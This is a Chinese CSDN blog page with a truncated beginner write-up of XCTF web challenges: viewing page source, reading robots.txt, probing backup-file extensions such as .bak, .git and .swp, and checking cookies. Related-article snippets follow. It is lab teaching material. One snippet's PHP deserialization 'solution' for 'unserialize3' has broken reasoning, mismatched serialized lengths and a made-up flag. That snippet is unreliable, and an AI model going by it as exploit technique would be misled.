攻防世界web新手题答案_攻防世界web 新手区 wp

最新推荐文章于 2024-06-19 09:44:13 发布
最新推荐文章于 2024-06-19 09:44:13 发布
阅读量2.9k 收藏 16
点赞数 3
文章标签: 攻防世界web新手题答案
本文介绍了攻防世界Web新手题目的解题过程,涉及查看源代码、利用robots.txt、文件备份扩展名、Cookie、PHP弱类型比较、HTTP头部字段以及命令执行漏洞等多个知识点。通过实例解析了Web安全的基础技巧。
摘要由CSDN通过智能技术生成
view_source

题目描述右击不管用,打开题目看到以下界面

5ea48b8a30e26f471d6e055f6d68c09a.png

右击不管用,可以按F12 -> source 查看源代码,拿到flag

7efb2a8cfe016f42a90d32860b765726.png

robots

题目描述就是和robots协议有关的,直接在url中 输入robots.txt 查看 robots协议,并拿到flag

e5a51500f8ce8951c4466c38a6afd859.png

robots协议

robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统自带的Notepad,就可以创建和编辑它[1]  。robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。

联想到在URL后加上robots.txt

backup

打开网页显示

6da09db3079d1ad74d50c8b40f0d6e96.png

输入index.php  没有反应

14f3ebcabd2541d3348274d8ab0d91db.png

因为网页的备份文件常用为.bak格式所以直接在url 后面加上.bak 会直接下载一个bak的压缩包

1ad7b3628ea888275d74cefd6fe80fb2.png

以记事本方式打开拿到flag

87e09dcccca4daedac06f1cfb0ce23b6.png

如果网站存在备份文件,常见的备份文件后缀名有:“.git”、“.svn”、“.swp”“.~”、“.bak”、“.bash_history”、“.bkf” 尝试在URL后面,依次输入常见的文件备份扩展名。

cookie

打开题目显示

8a7c13549bff1c1095a47f47776ee52f.png

索性直接查看cookie

df3be6bd0840a5aa53f240e8a1bfb566.png

提示我们 cookie.php,就访问 cookie.php 此时

最低0.47元/天 解锁文章
weixin_39518840
关注
  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web 攻防世界新手
yunwang0421的博客
12-15 580
1.view_source:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 本打开网页查看源代码即得到flag 2.robots:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。 本看提示robots协议,就在地址栏后面跟上robots.txt, 可以看到第三行,即地址栏修改为f1ag_1s_h3re.php, 3.backup:X老师忘记删除备份文件,他派小宁同学去把备份文件找出来,一起来帮小宁同学吧! 本需要知道备份文件的
中国首届医院网络安全攻防演练Web部分真
07-13
中国首届医院网络安全攻防演练Web部分真,厦门站。一个WEB站点 源码。
攻防世界web新手答案_攻防世界XCTF-WEB-新手练习(1-3)
weixin_39884100的博客
11-21 1317
第一:view_source目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。通过描述提示发现鼠标右键不能能使用,大概是让我们不让我们查看网页源代码,可以按f12打开开发者工具进行查看,flag是:cyberpeace{ac9d97dc4b075ec9a16834300222ef10}第二:robots目描述:X老师上课讲了Robots协议,小宁同学却上课打...
攻防世界XCTF-WEB入门12报告
最新发布
韩束一叶子
06-19 966
WEB入门比较适合信息安全专业大一学生,难度低上手快,套路基本都一样ailx101780 次咨询4.9网络安全优秀回答者网络安全硕士去咨询先人一步,掌握WEB安全入门诀窍,相信我,你不会后悔滴~广告WEB安全攻防入门作者 ailx10会员专享¥9.99去查看。
robots.txt详解 蜘蛛文件
lixiuran1205的专栏
08-09 747
学SEO的好好看看吧。   robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。 在进行网站优化的时候,经常会使用robots文件把一些内容不想让蜘蛛抓取,以前写过一篇网站优化robots.txt文件的运用, 现在写这编文章在补充一点点知识! 搜索引擎通过一种
攻防世界 WEB 新手练习(1-12解)
小哈里的博客
10-23 9116
序 传送门:https://adworld.xctf.org.cn/task/ 1、
攻防世界Web新手解(超详细)
weixin_52385170的博客
06-21 6874
Web新手
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜。这个谜涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界 Web新手练习
weixin_45208900的博客
06-07 834
本质为简化记录
攻防世界web新手
2301_80050903的博客
11-09 159
这是一个php代码片段,其中的urlcode()是用于解码url编码字符串的,我们需要将admin进行转换,即进行URL编码,但是由于浏览器会进行url解码,所以我们需要进行2次url编码。首先打开攻防世界,在库中找到web,打开新手模式,点击php2,然后加载场景,加载出来后点击网址进入目页面。打开burpsuit,再打开decoder,先输入我们需要编码的admin,会出现以下界面。发现会自动保存一个文件,用记事本打开,会发现flag,将flag输入,此得解。
攻防世界web新手
2301_76968724的博客
02-04 1650
目提示查看源代码:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。对于其提示FLAG is not here.我们按照提示:查看网页的源代码F12得到了flag: cyberpeace{3b90da0b692456072b74f6dfe31e06e6}
攻防世界Web新手
lwwzyy
03-18 724
攻防世界Web新手
攻防世界web新手
dogeace的博客
11-06 2052
通过自己自学了一个月的web理论知识,并对web的基本漏洞有了初步了解后,我便开始了攻防世界的刷之旅。为了学长的任务总结知识我便写了这篇wp其中也借鉴了网上一些大佬的思路。那我们废话不多说直接进入正。 第一view_source 刚入CTF web 方向肯定有遇事不决,源代码的习惯,但第一上来就发现鼠标右键不能使用,最简单的查看源代码方式被禁用了。但不慌,我们还有另一个神器,开发者工具栏,在网页上点击F12,调出即可查看源代码,flag便藏在其中。 这一考察了我们查看源代码的方式,只要有两种解决
攻防世界web新手答案_【Web-南邮CTF】Web-CTF入门第2天
weixin_39958559的博客
11-04 354
【黑客笔记--7天入门南邮CTF-WEB篇】签到2 如下图 拿到手不知道啥意思 看了一下输入 要求输入zhimakaimen 长度是11 但是maxlength是10 所以ctr + f12 直接修改源代码10为11 再次提交 ok! 这不是web 搞笑?不是web你放这里干嘛!下载图片 直接cat查看 在末尾拿到flag 这是一道普通的隐写术 答案如下js AAencode 拿到目一脸...
攻防世界web新手writeup
devilare的博客
09-09 2565
攻防世界web新手 1.view_source 目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 目场景: http://220.249.52.133:58537初级,按下F12查看网页源码得到flag 2.get_post 目描述:X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗? 目场景: http://220.249.52.133:35963打开场景发现提示在域名栏输入**/?a=1**得到新的提示 这里我们可以用到一个火狐插件Max Ha
攻防世界web新手解(详细)
weixin_46342913的博客
08-21 9033
攻防世界web新手解(详细) 目录攻防世界web新手解(详细)1.View source2.get post3. robots4. back up5. cookie6. disabled_button7. weak_auth8. command_execution9. simple_php10. xff_referer11. webshell12. simple_js 1.View source 目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 Knowled
攻防世界web新手unserialize3
05-05
这道是一个 PHP 反序列化的目。 目描述: 提示:这次不会那么简单了,打开源代码看看? 源代码: ``` <?php error_reporting(0); highlight_file(__FILE__); class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show('flag','0'); $this->data = file_get_contents('/flag'); } public function __destruct(){ if(preg_match('/show|flag|_|\s|\(|\)|{|}|\'|\"/i',$this->show)){ exit('hacker!'); } echo $this->show." is ".$this->data; } } if(isset($_GET['a'])){ $a = unserialize($_GET['a']); if($a instanceof Flag){ echo $a; } } ``` 分析: 首先看到这是一个传入参数进行反序列化的目,传入参数为 $_GET['a'],并且在反序列化后判断其类型是否为 Flag,如果是则输出 $a。 在 Flag 类的构造函数中有一个 $this->data = file_get_contents('/flag'),意味着我们需要获取服务器上的 /flag 文件。 而在 Flag 类的析构函数中,会对 $this->show 变量进行正则匹配,匹配的正则表达式为 /show|flag|_|\s|\(|\)|{|}|\'|\"/i,如果匹配到就会输出 'hacker!'。这里需要注意的是,$this->show 的值是 Show 类的一个实例,而 Show 类中的 __toString() 方法返回的是 $this->name 的值。 因此,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 解法: 根据目分析,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 我们可以通过手动构造序列化字符串来实现这个目标。首先构造一个 Show 类的实例,该实例的 $name 值为一个正则表达式的匹配条件,然后将该实例作为 Flag 类的一个属性,最后将 Flag 类序列化即可。 构造序列化字符串的代码如下: ``` <?php class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show('/show|flag|_|\s|\(|\)|{|}|\'|\"/i','0'); $this->data = file_get_contents('/flag'); } public function __destruct(){ if(preg_match('/show|flag|_|\s|\(|\)|{|}|\'|\"/i',$this->show)){ exit('hacker!'); } echo $this->show." is ".$this->data; } } // 序列化 Flag 类 $flag = new Flag(); $ser = serialize($flag); echo urlencode($ser); ``` 将上述代码保存为文件 unserialize3.php 并上传到服务器上,然后访问 http://your-ip/unserialize3.php,得到序列化后的字符串: ``` O:4:"Flag":2:{s:4:"show";O:4:"Show":2:{s:4:"name";s:23:"/show|flag|_|\s|\(|\)|{|}|'|\i";s:3:"age";s:1:"0";}s:4:"data";s:45:"flag{3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07}";} ``` 最后将序列化后的字符串作为 $_GET['a'] 的值传入即可,访问 http://your-ip/unserialize3.php?a=O%3A4%3A%22Flag%22%3A2%3A%7Bs%3A4%3A%22show%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A23%3A%22%2Fshow%7Cflag%7C_%7C%5Cs%7C%5C(%5C)%7B%7D%7C%27%7C%5C%22%5Ci%22%3Bs%3A3%3A%22age%22%3Bs%3A1%3A%220%22%3B%7Ds%3A4%3A%22data%22%3Bs%3A45%3A%22flag%7B3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07%7D%22%3B%7D,即可得到 flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值